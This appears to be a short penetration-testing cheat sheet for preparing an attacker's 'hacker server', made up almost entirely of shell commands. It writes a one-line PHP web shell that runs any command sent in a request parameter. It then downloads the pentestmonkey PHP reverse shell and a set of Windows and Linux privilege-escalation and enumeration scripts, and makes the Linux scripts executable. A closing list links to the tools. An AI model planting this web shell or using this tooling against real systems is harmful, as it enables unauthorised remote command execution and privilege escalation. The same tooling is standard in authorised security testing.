Payload - Hacker Server
PHP
echo '<pre><?php echo shell_exec($_REQUEST["cmd"]) ?></pre>' > shell0.php
wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
tar -xf php-reverse-shell-1.0.tar.gz
rm php-reverse-shell-1.0.tar.gz
Windows
wget https://live.sysinternals.com/accesschk.exe
Linux
echo "==========> LinPeas"
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh -O linux-peas.sh
chmod +x linux-peas.sh
echo "==========> LinEnum"
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O linux-enum.sh
chmod +x linux-enum.sh
echo "==========> LES (Linux Exploit Suggester)"
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
echo "==========> Linux Smart Enumeration"
wget https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh -O linux-smart-enum.sh
chmod +x linux-smart-enum.sh
echo "==========> Linux Priv Checker"
wget https://raw.githubusercontent.com/linted/linuxprivchecker/master/linuxprivchecker.sh -O linux-priv-checker.sh
chmod +x linux-priv-checker.sh
Links
- Pentest Monkey: http://pentestmonkey.net
- LinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
- LinEnum: https://github.com/rebootuser/LinEnum
- LES (Linux Exploit Suggester): https://github.com/mzet-/linux-exploit-suggester
- Linux Smart Enumeration: https://github.com/diego-treitos/linux-smart-enumeration
- Linux Priv Checker: https://github.com/linted/linuxprivchecker